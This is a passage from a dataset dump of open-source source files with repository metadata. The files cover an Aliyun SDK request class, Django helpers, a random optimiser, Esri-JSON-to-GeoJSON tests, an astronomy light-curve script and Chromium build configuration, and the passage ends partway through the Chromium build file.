blob_id (string, 40–40) | directory_id (string, 40–40) | path (string, 3–616) | content_id (string, 40–40) | detected_licenses (sequence, 0–112) | license_type (2 classes) | repo_name (string, 5–115) | snapshot_id (string, 40–40) | revision_id (string, 40–40) | branch_name (777 classes) | visit_date (timestamp[us], 2015-08-06 10:31:46 – 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 – 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 – 2023-09-06 01:08:06) | github_id (int64, 4.92k – 681M, nullable ⌀) | star_events_count (int64, 0 – 209k) | fork_events_count (int64, 0 – 110k) | gha_license_id (22 classes) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 – 2023-09-14 21:59:50, nullable ⌀) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 – 2023-08-21 12:35:19, nullable ⌀) | gha_language (149 classes) | src_encoding (26 classes) | language (1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 3 – 10.2M) | extension (188 classes) | content (string, 3 – 10.2M) | authors (sequence, 1 – 1) | author_id (string, 1 – 132)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
afe3e972640f342df29ec41f8483b6b5ac8b87da | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-alb/aliyunsdkalb/request/v20200616/UpdateAScriptsRequest.py | 0483ef14f68504f3e2d37de9657b8163fe62ec2d | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 3,065 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkalb.endpoint import endpoint_data
class UpdateAScriptsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Alb', '2020-06-16', 'UpdateAScripts','alb')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ClientToken(self): # String
return self.get_query_params().get('ClientToken')
def set_ClientToken(self, ClientToken): # String
self.add_query_param('ClientToken', ClientToken)
def get_AScripts(self): # Array
return self.get_query_params().get('AScripts')
def set_AScripts(self, AScripts): # Array
for index1, value1 in enumerate(AScripts):
if value1.get('AScriptName') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.AScriptName', value1.get('AScriptName'))
if value1.get('AScriptId') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.AScriptId', value1.get('AScriptId'))
if value1.get('ExtAttributeEnabled') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.ExtAttributeEnabled', value1.get('ExtAttributeEnabled'))
if value1.get('ScriptContent') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.ScriptContent', value1.get('ScriptContent'))
if value1.get('ExtAttributes') is not None:
for index2, value2 in enumerate(value1.get('ExtAttributes')):
if value2.get('AttributeValue') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.ExtAttributes.' + str(index2 + 1) + '.AttributeValue', value2.get('AttributeValue'))
if value2.get('AttributeKey') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.ExtAttributes.' + str(index2 + 1) + '.AttributeKey', value2.get('AttributeKey'))
if value1.get('Enabled') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.Enabled', value1.get('Enabled'))
def get_DryRun(self): # Boolean
return self.get_query_params().get('DryRun')
def set_DryRun(self, DryRun): # Boolean
self.add_query_param('DryRun', DryRun)
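# --- Illustrative usage sketch (editor's addition, not part of the generated SDK file) ---
# A minimal example of driving this request class. The AcsClient import is the
# standard aliyunsdkcore client; the placeholder credentials, region, and field
# values are assumptions for illustration only.
if __name__ == '__main__':
    from aliyunsdkcore.client import AcsClient
    client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-hangzhou')
    request = UpdateAScriptsRequest()
    request.set_ClientToken('unique-idempotency-token')
    # each dict is flattened into AScripts.N.* query parameters by set_AScripts above
    request.set_AScripts([{'AScriptId': 'as-123', 'AScriptName': 'demo', 'Enabled': True}])
    request.set_DryRun(True)
    print(client.do_action_with_exception(request))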
| [
"[email protected]"
] | |
22e9a901d92d103f5fa559120bb1832bbb4c64bb | 39d8ccea8f164bb25240b7b2ec82d7027bab2e52 | /venv/bin/markdown_py | 87d786275b88bdb478b0ff94eb7bfb860b6eaf86 | [] | no_license | yasin007/YYShop | 63b4cf6b5c285f78b63dd49c0946f9928dc43fea | f2159ab8da11b54e5c224ae2f9b79cee81a67d86 | refs/heads/master | 2020-04-04T00:22:31.373194 | 2018-11-01T02:02:16 | 2018-11-01T02:02:16 | 155,647,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | #!/Users/yiyang/Desktop/YYShop/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from markdown.__main__ import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"[email protected]"
] | ||
1970f69d158e97061c73bbe3e05ddb5331a5e538 | 3f62939fc249b544302dc0b57923c9b7f35fcd30 | /blog_agro/venv/bin/django-admin.py | dfa7a06f79ee8aba20f9614452a00f56b7c977c6 | [] | no_license | marri88/rest-framework-base | 5c3ba789bfa6089a09dc4564ad83aeb92bc140c3 | 197de7e4e791329b6286436afabf7f6e1bb80297 | refs/heads/master | 2023-06-27T18:42:56.659416 | 2021-07-30T15:06:12 | 2021-07-30T15:06:12 | 391,104,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | #!/home/aimira/Pycharm/blog_agro/venv/bin/python
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"[email protected]"
] | |
022010ca59bb2656af4a763f8213b6c1192ebf1b | 4a0cff7421d20c0826c38f40a7d30a298cdaf23b | /app/users/admin.py | 86ce6ae20b4f28dc77a2a1401e6c91bf50124ad4 | [
"MIT"
] | permissive | contestcrew/2019SeoulContest-Backend | 0699dea624386f05526e8b5f3c295839f58f3d05 | 2e99cc6ec6a712911da3b79412ae84a9d35453e1 | refs/heads/master | 2021-09-09T10:48:01.214064 | 2019-09-30T06:39:58 | 2019-09-30T06:39:58 | 205,388,431 | 0 | 3 | MIT | 2021-06-10T19:07:57 | 2019-08-30T13:31:53 | Python | UTF-8 | Python | false | false | 271 | py | from django.contrib import admin
from .models import User
class UserAdmin(admin.ModelAdmin):
list_display = ["id", "username", "is_staff", "date_joined"]
search_fields = ["username"]
ordering = ["-id", "date_joined"]
admin.site.register(User, UserAdmin)
| [
"[email protected]"
] | |
aa65658df4f8fc95e1ef9915be1117aaa44c049c | b76384bdcf39605ace17ee51c7902743cb315a00 | /opt/random_optimiser.py | b714186e31d9b24ce2b148f18caa5544bbd1cec0 | [
"MIT"
] | permissive | RemiLehe/dragonfly | c13c54ad106edb4de8f46c8adc44052f926d3685 | 950bee976b8dc5157e84236ce6fd3d4ec5612521 | refs/heads/master | 2022-08-15T05:04:57.176391 | 2018-09-08T01:05:33 | 2018-09-08T01:05:33 | 148,205,116 | 1 | 0 | MIT | 2018-09-10T19:04:34 | 2018-09-10T19:04:33 | null | UTF-8 | Python | false | false | 7,013 | py | """
Implements some instances of a random optimiser.
-- [email protected]
"""
# pylint: disable=invalid-name
from argparse import Namespace
import numpy as np
# Local imports
import exd.domains as domains
from exd.exd_utils import get_euclidean_initial_qinfos
from exd.exd_core import mf_exd_args
from opt.blackbox_optimiser import BlackboxOptimiser, blackbox_opt_args, \
CalledMFOptimiserWithSFCaller
from utils.option_handler import load_options
from utils.reporters import get_reporter
from utils.general_utils import map_to_bounds
random_optimiser_args = blackbox_opt_args
euclidean_random_optimiser_args = random_optimiser_args
mf_euclidean_random_optimiser_args = euclidean_random_optimiser_args + mf_exd_args
# Base class for Random Optimisation -----------------------------------------------
class RandomOptimiser(BlackboxOptimiser):
""" A class which optimises using random evaluations. """
#pylint: disable=attribute-defined-outside-init
#pylint: disable=abstract-method
# Constructor.
def __init__(self, func_caller, worker_manager, options=None, reporter=None):
""" Constructor. """
self.reporter = get_reporter(reporter)
if options is None:
options = load_options(random_optimiser_args, reporter=reporter)
super(RandomOptimiser, self).__init__(func_caller, worker_manager, model=None,
options=options, reporter=self.reporter)
def _opt_method_set_up(self):
""" Any set up specific to otptimisation. """
pass
def _get_method_str(self):
""" Returns a string describing the method. """
return 'rand'
def _add_data_to_model(self, qinfos):
""" Adds data to model. """
pass
def _child_build_new_model(self):
""" Builds a new model. """
pass
# Random optimiser for Euclidean spaces --------------------------------------------
class EuclideanRandomOptimiser(RandomOptimiser):
""" A class which optimises in Euclidean spaces using random evaluations. """
def is_an_mf_method(self):
""" Returns False since this is not a MF method. """
return False
def _determine_next_query(self):
""" Determines the next query. """
qinfo = Namespace(point=map_to_bounds(np.random.random(self.domain.dim),
self.domain.bounds))
return qinfo
def _determine_next_batch_of_queries(self, batch_size):
""" Determines the next batch of queries. """
qinfos = [self._determine_next_query() for _ in range(batch_size)]
return qinfos
def _get_initial_qinfos(self, num_init_evals):
""" Returns initial qinfos. """
return get_euclidean_initial_qinfos(self.options.init_method, num_init_evals,
self.domain.bounds)
# Multi-fidelity Random Optimiser for Euclidean Spaces -------------------------------
class MFEuclideanRandomOptimiser(RandomOptimiser):
""" A class which optimises in Euclidean spaces using random evaluations and
multi-fidelity.
"""
def is_an_mf_method(self):
""" Returns Truee since this is a MF method. """
return True
# Constructor.
def __init__(self, func_caller, worker_manager, call_fidel_to_opt_prob=0.25,
*args, **kwargs):
""" Constructor.
call_fidel_to_opt_prob is the probability with which we will choose
fidel_to_opt as the fidel.
"""
super(MFEuclideanRandomOptimiser, self).__init__(func_caller, worker_manager,
*args, **kwargs)
self.call_fidel_to_opt_prob = call_fidel_to_opt_prob
if not func_caller.is_mf():
raise CalledMFOptimiserWithSFCaller(self, func_caller)
def _determine_next_query(self):
""" Determines the next query. """
# An internal function which returns the next fidelity.
def _get_next_fidel():
""" Returns the next fidelity. """
if np.random.random() <= self.call_fidel_to_opt_prob:
return self.func_caller.fidel_to_opt
else:
return np.random.random(self.fidel_space.dim)
# Create and return qinfo
qinfo = Namespace(point=np.random.random(self.domain.dim),
fidel=_get_next_fidel())
return qinfo
def _determine_next_batch_of_queries(self, batch_size):
""" Determines the next batch of queries. """
qinfos = [self._determine_next_query() for _ in range(batch_size)]
return qinfos
def _get_initial_qinfos(self, num_init_evals):
""" Returns initial qinfos. """
return get_euclidean_initial_qinfos(self.options.init_method, num_init_evals,
self.domain.bounds, self.options.fidel_init_method, self.fidel_space.bounds,
self.func_caller.fidel_to_opt,
self.options.init_set_to_fidel_to_opt_with_prob)
# APIs for random optimisation ===========================================================
# An API for single fidelity optimisation
def random_optimiser_from_func_caller(func_caller, worker_manager, max_capital, mode,
options=None, reporter='default'):
""" Creates a EuclideanRandomOptimiser Object and optimises the function. """
reporter = get_reporter(reporter)
if isinstance(func_caller.domain, domains.EuclideanDomain):
optimiser_constructor = EuclideanRandomOptimiser
dflt_list_of_options = euclidean_random_optimiser_args
else:
raise ValueError('Random optimiser not implemented for domain of type %s.'%(
type(func_caller.domain)))
# Load options
if options is None:
options = load_options(dflt_list_of_options)
options.mode = mode
# Create optimiser
optimiser = optimiser_constructor(func_caller, worker_manager, options, reporter)
# optimise and return
return optimiser.optimise(max_capital)
# An API for multi-fidelity optimisation
def mf_random_optimiser_from_func_caller(func_caller, worker_manager, max_capital, mode,
options=None, reporter='default',
*args, **kwargs):
""" Creates a MF EuclideanRandomOptimiser Object and optimises the function. """
reporter = get_reporter(reporter)
if isinstance(func_caller.domain, domains.EuclideanDomain) and \
isinstance(func_caller.fidel_space, domains.EuclideanDomain):
optimiser_constructor = MFEuclideanRandomOptimiser
dflt_list_of_options = mf_euclidean_random_optimiser_args
else:
raise ValueError(('MF Random optimiser not implemented for (domain, fidel_space) '
+ 'of types (%s, %s).')%(
type(func_caller.domain), type(func_caller.fidel_space)))
# Load options
if options is None:
options = load_options(dflt_list_of_options)
options.mode = mode
# Create optimiser
optimiser = optimiser_constructor(func_caller, worker_manager, options=options,
reporter=reporter, *args, **kwargs)
# optimise and return
return optimiser.optimise(max_capital)
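# --- Illustrative usage sketch (editor's addition) ---
# How the single-fidelity API above is typically invoked. `get_func_caller` and
# `get_worker_manager` are hypothetical stand-ins: in this codebase the caller
# would construct a EuclideanFunctionCaller and a worker manager from the exd
# package, and optimise() typically returns (opt_val, opt_pt, history).
#
#   func_caller = get_func_caller()        # wraps f and a EuclideanDomain
#   worker_manager = get_worker_manager()  # e.g. a synthetic/multiprocessing manager
#   opt_val, opt_pt, history = random_optimiser_from_func_caller(
#       func_caller, worker_manager, max_capital=100, mode='asy')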
| [
"[email protected]"
] | |
ae395a7c4ec0756abf0ced1656e481bec76d45f8 | fd3c7bf3d070ac6da0df9c6aeb6d8f9d45a3112f | /tests/esrijson_tests.py | 809ee3500b1a0658cf6222cf7f594cc27189d5ae | [
"MIT"
] | permissive | loveland/pyesridump | 3c4c020c18716b9b250faa98039fef4d3e745edc | 089767147b451e47a7285ca082ec4f02081c632d | refs/heads/master | 2020-03-26T09:04:48.403060 | 2018-12-12T21:49:12 | 2018-12-12T21:49:12 | 144,734,493 | 1 | 0 | MIT | 2018-12-12T21:49:14 | 2018-08-14T14:52:18 | Python | UTF-8 | Python | false | false | 16,909 | py | import unittest
from esridump import esri2geojson
class TestEsriJsonToGeoJson(unittest.TestCase):
def setUp(self):
self.maxDiff = None
def assertEsriJsonBecomesGeoJson(self, esrijson, geojson):
out_json = esri2geojson(esrijson)
self.assertDictEqual(out_json, geojson)
class TestGeoJsonPointConversion(TestEsriJsonToGeoJson):
def test_point(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"x": 496814.6,
"y": 265006.2
},
"attributes": None
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Point",
"coordinates": [496814.6, 265006.2],
}
}
)
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"points": [
[496814.6, 265006.2],
]
},
"attributes": None
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Point",
"coordinates": [496814.6, 265006.2],
}
}
)
def test_multi_point(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"points": [
[41.83, 71.01],
[56.95, 33.75],
[21.79, 36.56]
],
},
"attributes": None
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "MultiPoint",
"coordinates": [
[41.83, 71.01],
[56.95, 33.75],
[21.79, 36.56]
]
}
}
)
def test_empty_point(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"x": None,
},
},
{
"type": "Feature",
"properties": None,
"geometry": None
}
)
class TestGeoJsonLinestringConversion(TestEsriJsonToGeoJson):
def test_linestring(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"paths" : [
[[-97.06138,32.837], [-97.06133,32.836], [-97.06124,32.834], [-97.06127,32.832]]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "LineString",
"coordinates": [
[-97.06138,32.837], [-97.06133,32.836], [-97.06124,32.834], [-97.06127,32.832]
],
}
}
)
def test_multi_linestring(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"paths" : [
[[-97.06138,32.837], [-97.06133,32.836], [-97.06124,32.834], [-97.06127,32.832]],
[[-97.06326,32.759], [-97.06298,32.755]]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "MultiLineString",
"coordinates": [
[ [-97.06138,32.837], [-97.06133,32.836], [-97.06124,32.834], [-97.06127,32.832] ],
[ [-97.06326,32.759], [-97.06298,32.755] ]
],
}
}
)
def test_real_linestring(self):
self.assertEsriJsonBecomesGeoJson(
{
"attributes": {
"objectid":187,
"st_length(shape)":1322.4896687156252
},
"geometry":{
"paths":[
[[-95.42428663740543,39.743798710848658],[-95.424285648691338,39.744302699946864],[-95.424279518608387,39.747429247542691]]
]
}
},
{
"type": "Feature",
"properties": {
"objectid": 187,
"st_length(shape)": 1322.4896687156252
},
"geometry": {
"type": "LineString",
"coordinates": [
[-95.42428663740543, 39.74379871084866], [-95.42428564869134, 39.744302699946864], [-95.42427951860839, 39.74742924754269]
]
}
}
)
class TestGeoJsonPolygonConversion(TestEsriJsonToGeoJson):
def test_polygon(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Polygon",
"coordinates": [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
]
],
}
}
)
def test_polygon_with_hole(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Polygon",
"coordinates": [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
]
],
}
}
)
def test_polygon_close(self):
# Esri-JSON allows polygons that aren't closed. GeoJSON requires them to be closed.
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Polygon",
"coordinates": [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
]
],
}
}
)
def test_polygon_strip_invalid_rings(self):
# Esri JSON allows rings with three points (A-B-A) that are essentially lines. GeoJSON doesn't.
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1]
],
[
[1,1],
[1,4],
[1,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Polygon",
"coordinates": [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
]
],
}
}
)
def test_ring_is_clockwise(self):
from esridump.esri2geojson import ring_is_clockwise
self.assertFalse(ring_is_clockwise(
[[-86.3393396, 33.9767272], [-86.3392317, 33.9767215], [-86.3391237, 33.9767234], [-86.3392317, 33.9767215], [-86.3393396, 33.9767272]]
))
self.assertTrue(ring_is_clockwise(
[[-86.3394465, 33.9767405], [-86.3393396, 33.9767272], [-86.3394465, 33.9767405], [-86.3395516, 33.9767613], [-86.3394465, 33.9767405]]
))
def test_skip_bad_ring(self):
self.assertEsriJsonBecomesGeoJson(
{
'geometry': {
'rings': [
[[-86.3393396, 33.9767272], [-86.3392317, 33.9767215], [-86.3391237, 33.9767234], [-86.3392317, 33.9767215], [-86.3393396, 33.9767272]],
[[-86.3394465, 33.9767405], [-86.3393396, 33.9767272], [-86.3394465, 33.9767405], [-86.3395516, 33.9767613], [-86.3394465, 33.9767405]],
[[-86.3385404, 33.9768611], [-86.3385637, 33.9768556], [-86.3385404, 33.9768611], [-86.3385047, 33.9768669], [-86.3384686, 33.9768702], [-86.3385047, 33.9768669], [-86.3385404, 33.9768611]],
[[-86.3373056, 33.9769147], [-86.3373895, 33.9768781], [-86.3373056, 33.9769147], [-86.3372257, 33.9769572], [-86.3373056, 33.9769147]],
[[-86.3383601, 33.9768650], [-86.3383248, 33.9768582], [-86.3382902, 33.9768490], [-86.3383248, 33.9768582], [-86.3383601, 33.9768650]],
[[-86.3413982, 33.9774822], [-86.3413947, 33.9774828], [-86.3413947, 33.9774828], [-86.3413982, 33.9774822]]
]
},
'attributes': {}
},
{
'type': 'Feature',
'geometry': {
'type': 'MultiPolygon',
'coordinates': [
[
[[-86.3394465, 33.9767405], [-86.3393396, 33.9767272], [-86.3394465, 33.9767405], [-86.3395516, 33.9767613], [-86.3394465, 33.9767405]],
[[-86.3385404, 33.9768611], [-86.3385637, 33.9768556], [-86.3385404, 33.9768611], [-86.3385047, 33.9768669], [-86.3384686, 33.9768702], [-86.3385047, 33.9768669], [-86.3385404, 33.9768611]],
],
[
[[-86.3373056, 33.9769147], [-86.3373895, 33.9768781], [-86.3373056, 33.9769147], [-86.3372257, 33.9769572], [-86.3373056, 33.9769147]],
[[-86.3383601, 33.9768650], [-86.3383248, 33.9768582], [-86.3382902, 33.9768490], [-86.3383248, 33.9768582], [-86.3383601, 33.9768650]],
],
[
[[-86.3413982, 33.9774822], [-86.3413947, 33.9774828], [-86.3413947, 33.9774828], [-86.3413982, 33.9774822]]
],
]
},
'properties': None
}
)
def test_multi_polygon(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
],
[
[5,1],
[5,4],
[8,4],
[8,1],
[5,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "MultiPolygon",
"coordinates": [
[
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
]
],
[
[
[5,1],
[5,4],
[8,4],
[8,1],
[5,1]
]
]
],
}
}
)
def test_multi_polygon_close(self):
# We should close the rings of a multipolygon if they aren't closed already
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
],
[
[5,1],
[5,4],
[8,4],
[8,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "MultiPolygon",
"coordinates": [
[
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
]
],
[
[
[5,1],
[5,4],
[8,4],
[8,1],
[5,1]
]
]
],
}
}
)
def test_empty_polygon(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [ ]
},
},
{
"type": "Feature",
"properties": None,
"geometry": None
}
)
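# Editor's addition: allow running this test module directly; the original file
# presumably relied on an external runner such as nose or pytest.
if __name__ == '__main__':
    unittest.main()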
| [
"[email protected]"
] | |
659da2ed1830691916e79d88dcff073d2175e3ab | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/HundredRun/KUV_00486-2016/sdB_KUV_00486-2016_lc.py | b02b47a0574e563b9801476c5c5d0b466ad7622c | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[191.49438,-19.999389], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_KUV_00486-2016 /sdB_KUV_00486-2016_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
bf9a250bb60d5bd8acf6f007ac45e93468b1b0e2 | 2e8d5422aba03edc10154225db2fc39af5e98660 | /Code/NativePython/GPUCommandList.py | 2ba28c79817a35025ab9d8e97f51defbb8806e0e | [
"MIT"
] | permissive | MYheavyGo/RenderPipeline | f500611bef020f45ac63023df206f978be887fc5 | 70002e71c25ba93f05c73d041943d07eb639641c | refs/heads/master | 2021-01-15T14:49:58.756014 | 2016-01-18T15:59:14 | 2016-01-18T15:59:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,638 | py | """
RenderPipeline
Copyright (c) 2014-2015 tobspr <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
class GPUCommandList(object):
def __init__(self):
self._commands = []
def add_command(self, cmd):
self._commands.append(cmd)
def get_num_commands(self):
return len(self._commands)
def write_commands_to(self, dest, limit=32):
num_commands_written = 0
while num_commands_written < limit and self._commands:
self._commands.pop(0).write_to(dest, num_commands_written)
num_commands_written += 1
return num_commands_written
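# --- Illustrative usage sketch (editor's addition) ---
# GPUCommandList only requires each queued command to expose write_to(dest, index);
# the tiny stub below is an assumption used to demonstrate the batching behaviour.
if __name__ == '__main__':
    class _StubCommand(object):
        def __init__(self, payload):
            self.payload = payload
        def write_to(self, dest, index):
            # record where in the batch this command was written
            dest.append((index, self.payload))
    cmds = GPUCommandList()
    for i in range(40):
        cmds.add_command(_StubCommand(i))
    buffer = []
    # first call drains at most `limit` commands, the second call takes the rest
    print(cmds.write_commands_to(buffer, limit=32))  # -> 32
    print(cmds.write_commands_to(buffer, limit=32))  # -> 8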
| [
"[email protected]"
] | |
548d1a106183486e625e18b56894ddc4126ea39c | dd80a584130ef1a0333429ba76c1cee0eb40df73 | /external/chromium_org/ui/keyboard/keyboard.gyp | 4ea3b09808b9285366865be616e0eb9ecf06483b | [
"MIT",
"BSD-3-Clause"
] | permissive | karunmatharu/Android-4.4-Pay-by-Data | 466f4e169ede13c5835424c78e8c30ce58f885c1 | fcb778e92d4aad525ef7a995660580f948d40bc9 | refs/heads/master | 2021-03-24T13:33:01.721868 | 2017-02-18T17:48:49 | 2017-02-18T17:48:49 | 81,847,777 | 0 | 2 | MIT | 2020-03-09T00:02:12 | 2017-02-13T16:47:00 | null | UTF-8 | Python | false | false | 3,341 | gyp | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
'target_name': 'keyboard_resources',
'type': 'none',
'variables': {
'grit_out_dir': '<(SHARED_INTERMEDIATE_DIR)/ui/keyboard',
},
'actions': [
{
'action_name': 'keyboard_resources',
'variables': {
'grit_grd_file': 'keyboard_resources.grd',
},
'includes': [ '../../build/grit_action.gypi' ],
},
],
'includes': [ '../../build/grit_target.gypi' ],
'copies': [
{
'destination': '<(PRODUCT_DIR)',
'files': [
'<(SHARED_INTERMEDIATE_DIR)/ui/keyboard/keyboard_resources.pak',
],
},
],
},
{
'target_name': 'keyboard',
'type': '<(component)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'../../content/content.gyp:content_browser',
'../../ipc/ipc.gyp:ipc',
'../../skia/skia.gyp:skia',
'../../url/url.gyp:url_lib',
'../aura/aura.gyp:aura',
'../compositor/compositor.gyp:compositor',
'../events/events.gyp:events',
'../gfx/gfx.gyp:gfx',
'../ui.gyp:ui',
'keyboard_resources',
],
'defines': [
'KEYBOARD_IMPLEMENTATION',
],
'sources': [
'keyboard.cc',
'keyboard.h',
'keyboard_constants.cc',
'keyboard_constants.h',
'keyboard_controller.cc',
'keyboard_controller.h',
'keyboard_controller_observer.h',
'keyboard_controller_proxy.cc',
'keyboard_controller_proxy.h',
'keyboard_export.h',
'keyboard_switches.cc',
'keyboard_switches.h',
'keyboard_ui_controller.cc',
'keyboard_ui_controller.h',
'keyboard_ui_handler.cc',
'keyboard_ui_handler.h',
'keyboard_util.cc',
'keyboard_util.h',
]
},
{
'target_name': 'keyboard_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/base.gyp:test_support_base',
'../../content/content.gyp:content',
'../../skia/skia.gyp:skia',
'../../testing/gtest.gyp:gtest',
'../../url/url.gyp:url_lib',
'../aura/aura.gyp:aura',
'../aura/aura.gyp:aura_test_support',
